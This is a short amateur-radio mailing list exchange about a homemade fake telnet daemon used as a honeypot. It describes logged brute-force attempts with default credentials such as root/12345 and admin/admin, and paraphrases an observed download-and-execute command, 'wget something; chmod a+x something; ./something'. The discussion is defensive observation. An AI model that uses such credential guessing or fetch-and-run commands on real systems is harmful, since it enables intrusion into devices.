Rob, if you wouldn't mind emailing me privately (jim@photojim.ca) - unless discussing it here is OK - I wouldn't mind hearing how you did the fake telnetd. I think that's a brilliant idea.
Jim VE5EIS
-----Original Message----- From: 44Net [mailto:44net-bounces+jim=photojim.ca@hamradio.ucsd.edu] On Behalf Of Rob Janssen Sent: September-29-16 1:10 PM To: 44net@hamradio.ucsd.edu Subject: Re: [44net] Security - Telnet (port tcp/23)
I have a fake telnetd running on one of my systems that simply presents the user with a login prompt and logs what is being typed, and it shows endless connections trying things like root/12345 root/password admin/admin etc. They probably get into certain routers or other systems like that, then install some trojan that does further scanning. This is also indicated by certain loggings where they apparently believe they got logged in and then send a long string like "wget something; chmod a+x something; ./something" or similar.